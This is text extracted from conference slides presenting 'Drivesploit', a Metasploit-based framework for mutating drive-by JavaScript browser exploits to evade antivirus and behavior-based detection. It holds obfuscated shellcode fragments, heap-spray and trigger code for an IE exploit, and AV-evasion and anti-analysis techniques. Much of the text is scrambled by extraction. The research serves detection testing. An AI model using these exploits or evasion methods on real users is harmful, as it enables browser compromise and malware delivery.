DRIVESPLOIT

CIRCUMVENTING
AUTOMATED AND
MANUAL DETECTION
OF BROWSER EXPLOITS
Wayne Huang, Cofounder & CTO
Fyodor Yarochkin
Antonio Rohman Fernandez
Chris Hsiao
Armorize Technologies, Inc.
@waynehuang
wayne@armorize.com
@
i

One type of browser exploit:

Drive-by Downloads defined

Drive-by-Download Explained
Hackers distribute malware by
"poisoning" legitimate websites
Typical: injects malicious iframes
into HTML content

Drive-by-Download Explained
Affected websites:
Essentially becomes a delivery mechanism for
malware
Appear normal

Victims
Do not need to "click" or "agree to" anything
Simply connecting to the website executes the
attack

Drive-by Download Incidents

Aurora (Google)
June 2009-Feb 2010
Targeted
T
t d attack
tt k
IE 0day CVE-2010-0249
Confirmed publicly by Google,
Adobe Systems, Juniper Networks
and
d RackSpace
R kS
Total of 34 organization
g
targeted
g

Drive-by Download Incidents

DNF666 Mass SQL Injection
Since March, 2010
Jun:
J
Adobe
Ad b 0day
0d
CVE-2010-1297
CVE 2010 1297
Victims: Wall Street Journal,
J
Jarusalem
l
P t etc
Post,
t
dnf666.net, robint.us, 2677.in,
4589 i 22dnf.com
4589.in,
22d f

CNN

GameSpot

US Treasury

http://thompson.blog.avg.com/2010/05/treasurywebsitehacked.html

PlayStation.com

Washington Post

Dissecting Drive-By Downloads

Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d

12

ExploitServer

Dissecting Drive-By Downloads

Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d

ExploitServer

<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8

var arr =new Array;for (var i =0;i <sss.length;i ++){arr[i]=String.fromCharCode(sss[i]/7);}var

cc=arr.toString();cc=cc.replace(/,/g,"");cc=cc.replace(/@/g,",");eval(cc);var x1=new Array();for (i =0;i <
200;i ++){x1[i]=document.createElement("COMMENT");x1[i].data="abc";};var e1=null;function ev1(evt){
e1=document.createEventObject(evt);document.getElementById("sp1").innerHTML ="";
window.setInterval(ev2,50);}function ev2(){p="\ 13

Dissecting Drive-By Downloads

Exploit!
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d

ExploitServer

<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8

var arr =new Array;for (var i =0;i <sss.length;i ++){arr[i]=String.fromCharCode(sss[i]/7);}var

cc=arr.toString();cc=cc.replace(/,/g,"");cc=cc.replace(/@/g,",");eval(cc);var x1=new Array();for (i =0;i <
200;i ++){x1[i]=document.createElement("COMMENT");x1[i].data="abc";};var e1=null;function ev1(evt){
e1=document.createEventObject(evt);document.getElementById("sp1").innerHTML ="";
window.setInterval(ev2,50);}function ev2(){p="\ 14

Dissecting Drive-By Downloads

Exploit!
Exploits / droppers
Exploits/droppers

Dropperexecutes

ExploitServer

15

Dissecting Drive-By Downloads

Exploits / droppers
Exploits/droppers

ExploitServer

Malware
MalwareServer
16

Dissecting Drive-By Downloads

Exploits / droppers
Exploits/droppers

ExploitServer
Malware

MalwareServer
Controller

17

Dissecting Drive-By Downloads

Butwhowouldvisit?
But
who would visit?
ThekeynowisTRAFFIC
Exploits / droppers
Exploits/droppers

ExploitServer
Malware

MalwareServer
Controller

18

(1) Legitimate, injectable sites

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer
Malware

MalwareServer
Controller

19

(1) Legitimate, injectable sites

URLGenerators

Landing Site
LandingSite

May-Ongoing:
ay O go Exploits/droppers
g / DNF666
ass SQ
SQL
Exploits
droppers 666 mass
injections
ExploitServer
May-June: Shared
hosting compromise,
Malware
GoDaddy RackSpace,
GoDaddy,
RackSpace Network
Solutions, BlueHost, DreamHost
MalwareServer
Continuous targeted
attacks
20

(1) Legitimate, vulnerable sites

URLGenerators

Landing Site
LandingSite

Mass SQL injections

Exploits / droppers
Exploits/droppers
Mass hosting compromises

ExploitServer

Directly inside HTML / PHP / ASP

Malware

Hidden inside WorldPress files

Hidden inside DB

MalwareServer

Hidden inside DB stored procedures

21

(2) Man-in-the-Middle

WAN
URLGenerators

LAN
Landing Site
LandingSite

No tampering
p Exploits/droppers
g of
website
Exploits
/ droppers
LAN: ARP spoofing via ZXARPS
and other
ExploitServer
tools
Malware

WAN: March 2009,

2009 middle of route
route,
tw.msn.com, taiwan.cnet.com,
others
MalwareServer
Cisco advisory:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17778

22

LIVE DEMO 1

http://digg.com/software/
Internet_Storm_Center
Internet_Storm_Center_
_
_
_
Diary_2010_02_27
23

Live demo recap

Live demo recap

Injectedjavascript indigg.com

Live demo recap

1. Inject
j
jjavascript
p into digg.com
gg
2. Javascript loads iframe from our domain
zcrack.org
3. Metasploit (drivesploit) is running on
zcrack org serves ie peers exploit
zcrack.org,
4. Bypasses AV
5. IE visitor attacked, IE crashes,
meterpreter starts, jumps process to
notepad exe
notepad.exe
6. We have a shell :)

MOTIVATION
We p
provide solutions that monitors
websites and detect malicious
contents
t t 24
24x7
7
We use multiple
p behavior-,, heuristic-,,
and signature-based technologies
27

MOTIVATION
Most technologies are developed on
our own, BUT,
We also integrate anti-virus, whose
licenses are

$expensive$
28

MOTIVATION
We spend a lot of time testing our own
technologies, and selecting anti-virus
t h l gi
technologies
The key is: how good are we (and them) at
detecting NEW drive-by downloads

29

MOTIVATION
We need a g
good framework to help
p us
replicate, manipulate, and mutate
exploits found in the wild
--into NEW derivatives

30

DRIVESPLOIT
IS BORN
ON TOP OF
METASPLOIT
31

INITIAL FINDINGS
ANTIVIRUS CAPABILITIES
DIFFER GREATLY!
DESKTOP AND API VERSIONS
DIFFER GREATLY IN PERFORMANCE
COST != PERFORMANCE

Antivirus vs. Drive-bys

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer
Malware

MalwareServer
Controller

33

Antivirus vs. Drive-bys

JAVASCRIPT
URLGenerators

Exploits / droppers
Exploits/droppers

Landing Site
LandingSite

JAVASCRIPT
JAVASCRIPT
ExploitServer

Malware

PE BINARY
PEBINARY
MalwareServer

Controller

34

Antivirus vs. Drive-bys

JAVASCRIPT
URLGenerators

Exploits / droppers
Exploits/droppers

Landing Site
LandingSite

JAVASCRIPT
JAVASCRIPT
ExploitServer

Malware

PE BINARY
PEBINARY
MalwareServer

Controller

35

Wewilldetect
We
will detect
thispart!!

Why we cant rely on PE detection

Exploit server domains are often taken down
after a few days, but the injected URL generators
and the exploit servers live on
Attack reported to the hosting / registrar
Domain banned by ISPs
Purchased duration was over

We want to detect the injection so our customers

can remove it
Actually
Actually, statically detecting javascript exploits is
quite difficult

36

THE TAO:
ECMA SCRIPTS
ECMA-SCRIPTS
JAVASCRIPT
VBSCRIPT
ADOBE JS
ACTIONSCRIPT
37

JAVASCRIPT!! (ECMA-SCRIPT)

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer
Malware

MalwareServer
Controller

38

JAVASCRIPT!! (ECMA-SCRIPT)

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer
Malware

Controller

39

JAVASCRIPT!! (ECMA-SCRIPT)

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer

Controller

40

JAVASCRIPT!! (ECMA-SCRIPT)

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

ExploitServer
(METASPLOT)

Controller

41

JAVASCRIPT!! (ECMA-SCRIPT)

URLGenerators

Landing Site
LandingSite

Exploits / droppers
Exploits/droppers

PAYLOAD
ExploitServer
(METASPLOT)
meterpreter
(memory
injection)
Controller

42

Drive-By wants to
Avoid detection at the victim's
desktop
Avoid detection by UTM/gateways
Avoid detection
b automated
by
t
t d
monitors
Live for as long
as possible
ibl

Drive-By wants to
CONCLUSION:
Reduce exposure:
Serve SELECTIVELY
Avoid detection and analysis:
Mutate well

Serve Selectively
HTTP LEVEL:
Serve only to:
Fresh IPs (serve once per IP)
set HTTP::client::onlyonce true

Particular referer (eg.

(eg Gumblar)
set HTTP::referer google.com

Particular agent string (vulnerable browser)

set HTTP::agent::MSIE 7.0

Black list

set HTTP::client::blacklist false

SCRIPT MUTATION
For exploit
F payload
For
l d
46

The goal is not to "obfuscate"...

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt
Heapspray
Trigger
gg

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt
Heapspray
Trigger
gg

<script>var shellraw =
"%u7679%u4673%u757b%u924e%u
66b9%ub441%u018d%u7df9%u241
c%ud631%u40b7%ueb11%u043d%u
be97%u212c%u05e1%u8335%u42fc
%ub893%u227f%u98d4%u484b%u8
c90%u13e0%uf8d3%u7aba%u7278
%u2034%u49f5%u259f%u9137%u3
39b%u1dd5%ub1b0%u3f99%u2f43
%u3cb6%ub2a8%ub30c%u4714%u3
d7b% 138% f803% 66b2% 97b9
d7b%ue138%uf803%u66b2%u97b9
%u9335%u767a%ub805%ue201%u4
a2f%u85a8%u7eeb%uf93b%u414f%
u257d%u78bf%u2c43%u7f99%ubb2
d%ub098%ub342%u918d%u3fb2%u
704a%u7147%u7f74%u3073%u77f9
%ubb40

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt

var j_object =
document.createElement('body');
j_object.addBehavior('#default#user
Data');
document.appendChild(j_object);

Heapspray
Trigger
gg

try{
for(counter=0;counter<10;
counter++){
t
){
j_object.setAttribute('s',window);}
}
catch(e){ }window status+ '';}
catch(e){}window.status+=
;}

JAVASCRIPT EXPLOIT DISEC

Shellcode

var counter;var shellcode=

unescape(shellraw);
var memory=newArray();var

BufferOvf

slackspace =0x86000
(shellcode.length*2);
var nops =
unescape("%u0c0c%u0c0c");

Heapspray
Trigger
gg

while(nops.length<slackspace/2){
nops+=nops;}var
} fillblock
fillbl k =
nops.substring(0,slackspace/2);
deletenops;
for(counter=0;counter<270;
counter++){memory[counter]=
fillblock +fillblock
+ fillblock +shellcode;
+ shellcode;

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt
Heapspray
Trigger
gg

<buttonid
<button
id='jj_id
id'
onclick='bootstrapper();'
style='display:none'></butt
on>

document.getElementById(
'j_id').onclick();

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt

OBFUSCATED
BLOB

Heapspray
Trigger
gg

DE
OBFUSCATOR

Primitive
F
Form

Obfuscated
F
Form

Dissecting Drive-By Downloads

Exploit!
Page+Browser
Page
+ Browser
Exploit
Payload=
d
downloader
l d

ExploitServer

<script>var sc=unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8

var arr =new Array;for (var i =0;i <sss.length;i ++){arr[i]=String.fromCharCode(sss[i]/7);}var

cc=arr.toString();cc=cc.replace(/,/g,"");cc=cc.replace(/@/g,",");eval(cc);var x1=new Array();for (i =0;i <
200;i ++){x1[i]=document.createElement("COMMENT");x1[i].data="abc";};var e1=null;function ev1(evt){
e1=document.createEventObject(evt);document.getElementById("sp1").innerHTML ="";
window.setInterval(ev2,50);}function ev2(){p="\ 54

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt

OBFUSCATED
BLOB

Heapspray
Start

Trigger
gg

DE
OBFUSCATOR

Primitive
F
Form

Obfuscated
F
Form

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt
Heapspray
Start

OBFUSCATED
BLOB
Mutate

Trigger
gg

DE
OBFUSCATOR

Primitive
F
Form

Obfuscated
F
Form

JAVASCRIPT EXPLOIT DISEC

Shellcode
MCorrupt
Heapspray
Start

OBFUSCATED
BLOB
Mutate

Trigger
gg

DE
OBFUSCATOR

Primitive
F
Form

Obfuscated
Prevent
F
Form

MUTATION FEATURES
IMPLEMENTED
SO FAR

1. Javascript Random Variable Auto

Replacement
Accepts
p ap
piece of jjavascript
p
Parses the javascript according to
grammer
Auto replaces all variable names and
function names with random names
Passes back:
a) the new javascript
pp g
b)) a vector of old-new name mappings

1. Javascript Random Variable Auto

Replacement
randomized =
Rex::Exploitation::DriveSploit::obfusca
tejs(js,
j (j ,
Rex::Exploitation::DriveSploit::AUTO_R
ANDOM_VARS)

2. Javascript Concat String

Obf
Obfuscation
ti
arr =
Rex::Exploitation::DriveSploit.obfusca
t j ( h ll d
tejs(shellcode,
Rex::Exploitation::DriveSploit::STRING
CONCAT)
shellcode
h ll d script
i t = arr[0]
[0]
shellcode_var = arr[1]

2. Javascript Concat String

Obf
Obfuscation
ti
% 7679% 4673% 757% 924
%u7679%u4673%u757%u924e
A1
A2
A3
A4
A5
A6

=
=
=
=
=
=

"%u7";
"679%";
679% ;
"u4673%";
"u75";
u75 ;
"7%u92";
"4e";

A3
A4
A1
A5
A2
A6

=
=
=
=
=
=

"u4673%";
"u75";
u75 ;
"%u7";
"7%u92";
7%u92 ;
"679%";
"4e";

2. Javascript Concat String

Obf
Obfuscation
ti
% 7679% 4673% 757% 924
%u7679%u4673%u757%u924e

B1 = A1+A2;
B2 = A3+A4;;
B3 = A5+A6;

Layer
ay 2

A3
A4
A1
A5
A2
A6

=
=
=
=
=
=

"u4673%";
"u75";
u75 ;
"%u7";
"7%u92";
7%u92 ;
"679%";
"4e";

2. Javascript Concat String

Obf
Obfuscation
ti
% 7679% 4673% 757% 924
%u7679%u4673%u757%u924e

B1 = A1+A2;
B2 = A3+A4;;
B3 = A5+A6;

B2 = A1+A2;
B3 = A5+A6;;
B1 = A3+A4;

2. Javascript Concat String

Obf
Obfuscation
ti
% 7679% 4673% 757% 924
%u7679%u4673%u757%u924e
A3 = "u4673%;A4
" 4673% A4 = "u75;
" 75
A1 = "%u7";
A5 = "7%u92;A2 = "679%";
A6 = "4e";
4e ; B2 = A1+A2;
B1 = A3+A4;B3 = A5+A6;C1=B1+B2;
D1=C1+B3;
// variable names are randomized

3. Javascript Random Text Insertion

insertret =
Rex::Exploitation::DriveSploit.getInse
rtion(shellcode, 4, 6, 10)
shellcode = insertret[0]
random insertion string = insertret[1]

3. Javascript Random Text Insertion

insertret =
Rex::Exploitation::DriveSploit.getInse
rtion(shellcode, 4, 6, 10)
# insert a fixed 6-character random
# string, for every 4-8 characters
returns
a) a piece of javascript containing the
injected string
b) Javascript variable name containing
the reverted, original string

4. Numeric Literal Mutation

slackspace
p
=
Rex::Exploitation::Drivespl
oit obfuscateNumber(0x86000
oit.obfuscateNumber(0x86000
)

4. Numeric Literal Mutation

slackspace
p
=
Rex::Exploitation::Drivespl
oit obfuscateNumber(0x86000
oit.obfuscateNumber(0x86000
)

( 6 ) (56 6 96) (3
) 8 (333
)
(246*2)+(5676*96)+(34*4)+8+(3332*1)

4. Numeric Literal Mutation

slackspace = 0x86000
slackspace
l k
=
(246*2)+(5676*96)+(34*4)+8+
(3332*1)

Trigger Prevention

Shellcode
MCorrupt

OBFUSCATED
BLOB

Heapspray
Start

Trigger
gg

DE
OBFUSCATOR

Primitive
F
Form

Obfuscated
Prevent
F
Form

Trigger prevention
<div onload
<img onload
var a=1; var b=0;
do {
useless code;
} while (a
(a==b);
b);
Fingerprinting-based encryption

TESTING IT OUT
UsingtheIEpeersexploitasexample
CVE20100806
(MS10018)

PLAIN: 17/42

RANDOM VARS: 16/42 (!)

INJECT SC: 13/42

RANDVAR+CONCAT SC+INJECT SC
11/42

ROUGHLY 6/17
ANTI VIRUS
ANTI-VIRUS
DETECTS BASED ON
SHELLCODE
(FOR THIS EXPLOIT)

CONCAT SC+CODE: 1/42

INJECT SC+CONCAT CODE: 0/42

RANDVAR+INJECT SC+CONCAT
CODE: 0/42

ANTIVIRUS
DESKTOP VERSION
IS MUCH STRONGER

ANTIVIRUS DESKTOP VERSION

Can monitor host environment
Hook into browsers
Easier to get raw form of
exploit

Behavior analysis
Buffer overflow behavior
Download-to-file
Download to file behavior

AntiVirus Desktop Kung Fu

Plain
Randomvariables
Split literals
Injection SC
InjectionSC
Concat SC
Concat CODE
Concat SC +Concat CODE
Inject SC+Concat CODE

To

Ag

Sc

Aa

Ky

AntiVirus Desktop Kung Fu

Plain
Randomvariables
Split literals
Injection SC
InjectionSC
Concat SC
Concat CODE
Concat SC +Concat CODE
Inject SC+Concat CODE

To

Ag

Sc Aa

Ky

LIVE DEMO 2
DESKTOP
ANTIVIRUS
BYPASS

5. FINGERPRINTINGBASED ENCRYPTION

Wepawet doesnt tell much

88

89

90

91

92

Browser Feature Table

IE7

FF

Safari

Opera

Chrome

Is contextmenu event supported

Is_contextmenu_event_supported

True

True

True

False

True

String_prototype_replace_ignore_functions

False

False

True(2.0.2)

False

False

Is_ES5_strict_mode_supported

False

False

False

False

False

Array prototype slice can convert to array

Array_prototype_slice_can_convert_to_array

False

True

True

True

True

Getelementsbytagname_returns_comment_nodes

True

False

False

False

False

Is_element_tagname_uppercased

True

True

True

True

True

Is_canvas_element_supported

False

True

True

True

True

Is_DOMFocusIn_supported

False

False

True

True

True

Is_CSS_boder_radius_supported

False

True

True

False

True

Function_identified_leaks_onto_enclosing_scope

True

False

False

False

False

Script_element_rejects_textnode_appending

True

False

False

False

False

Is_contextmenu_event_supported

True

True

True

False

True

Is_position_fixed_supported

False

True

True

False

True

Computed_style_return_static_positioned_element

False

False

False

True

False

93

5. Fingerprinting-Based Encryption
Summary
"This
This exploit works only for IE6
IE6"
"Give me an encrypted version of my
j
javascript
i t exploit
l it
"Give me javascript to generate the
decoding key"
y is only
y correctly
y generated
g
if the
"The key
javascript is run under IE6"

94

5. Fingerprinting-Based Encryption
Summary
A=Check1();
B=Check3();
C=Check4();
D Check6();
D=Check6();
E=Check8();
F=Check9();
();
G=Check12();
H=Check14();

95

5. Fingerprinting-Based Encryption
Summary
A=Check1();

A=Check6();

B=Check3();

B=Check12();

C=Check4();

C=Check8();

D=Check6();
D
Check6();

D=Check1();
D
Check1();

E=Check8();

E=Check4();

F=Check9();
();

F=Check14();
();

G=Check12();

G=Check3();

H=Check14();

H=Check9();

96

5. Fingerprinting-Based Encryption
Summary
A=Check1();

A=Check6();

B=Check3();

B=Check12();

C=Check4();

C=Check8();

D=Check6();
D
Check6();

D=Check1();
D
Check1();

E=Check8();

E=Check4();

F=Check9();
();

F=Check14();
();

G=Check12();

G=Check3();

H=Check14();

H=Check9();

97

Onetimekey

Encrypt
javascript
exploit
l
Generate
decoding
javascript

Why not Anti-Virus?

AV is to install on desktops
p / notebooks
Complicated normal behaviors
Strict resource constraints
Therefore, AV and gateway vendors rely
on:
Signature-based pattern matching technologies
LIGHTWEIGHT and ACCURATE

Why cant such technology used to detect

drive-by-downloads?

98

Javascripts are not harmful

t the
to
th environment
i
t

99

 so they are usually not reused

AV no g
good because drive-by-downloads
y
are in:
Disposable Javascript
Disposable PDF Adobe JS
Disposable Flash actionscript
All ECMAscripts

100
youdon'tusuallyreusethem

Javascript Packing Is a Norm

Packing is widely used by legitimate code!
To protect javascript source code
To reduce javascript size

Google Closure Compiler

http://code.google.com/closure/compiler/
http //code google com/clos e/compile /

Yahoo Javascript Packer (YUI Compressor)

http://developer.yahoo.com/yui/compressor/
p //
p y
/y /
p
/

Advanced HTML Protector

http://www.creabit.com/htmlprotect/

Dean
D
Edwards
Ed
d Packer
P k

http://dean.edwards.name/packer/

Online JS Obfuscator

http://www.iwebtool.com/html_encrypter

http://www.cha88.cn/safe/fromCharCode.php
101

 OK so AV doesn
doesntt work (that well)
well)
How about behavior-based approaches?

102

Defeating Behavior Analysis

1. Use VBScript

Exploits in VBScript
URL generators in VBScript
Exploits in / generated by VBScript
May defeat SpiderMonkey et al (Rhino,
JSunPack, etc)

2. Dont serve to detectors

You cant detect what you dont have

Serve to each IP only once
Detect agent strings
Collect robot IPsGoogle, Yahoo, security
vendors
103

Defeating Behavior Analysis

3. Fingerprint-based
g p
encryption
yp
3. Little
l b
but effective
ff
techniques
h

Sleep(30000); //using SetTimeout

Timelock puzzles

104

Future Work
Randomly chop up scripts and split into
individual
d d l ffiles
l
g VBscript
p instead of jjavascript
p
Generating
Encrypting
using data
existing
outside of
HTML
HTTP headers

Discussion
The Panopticlick
p
experiment
p
by
y
Eckersley of EFF
94.2% of "typical
yp
desktop
p browsers are unique
q

Can fingerprinting-based encryption

be integrated with this type of
individual fingerprinting, to prevent
detection and analysis of target
attacks?

THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www drivesploit org
http://www.drivesploit.org
Credits: wayne huang,
g fyodor yarochkin,
antonio rohman fernandez

Special thanks to: Benson Wu, Jeremy Chiu,

Kuon Ding,
Ding Felix,
Felix Cola

References
James Lee, Using guided missles in drive-bys

http://www.slideshare.net/egypt/using
http://www
slideshare net/egypt/using-guided-missiles-inguided missiles in
drivebys-automatic-browser-fingerprinting-and-exploitation-withthe-metasploit-frameworks-browser-autopwn

Sebastian Porst,, How to really

y obfuscate your
y
PDF malware http://www.slideshare.net/cblichmann/howto-really-obfuscate-your-pdf-malware

Jeremy Chiu, 0box analyzer: afterdark

runtime forensics for automated malware
analysis and clustering

http://www.slideshare.net/wayne_armorize/0-box-analyzerafterdark-runtime-forensics-for-automated-malware-analysis-andft d k
ti
f
i f
t
t d
l
l i
d
clustering-2

HeapLib support added to Metasploit 3

http://blog.metasploit.com/2007/04/heaplib-support-added-tohttp://blog
metasploit com/2007/04/heaplib support added to
metasploit-3.html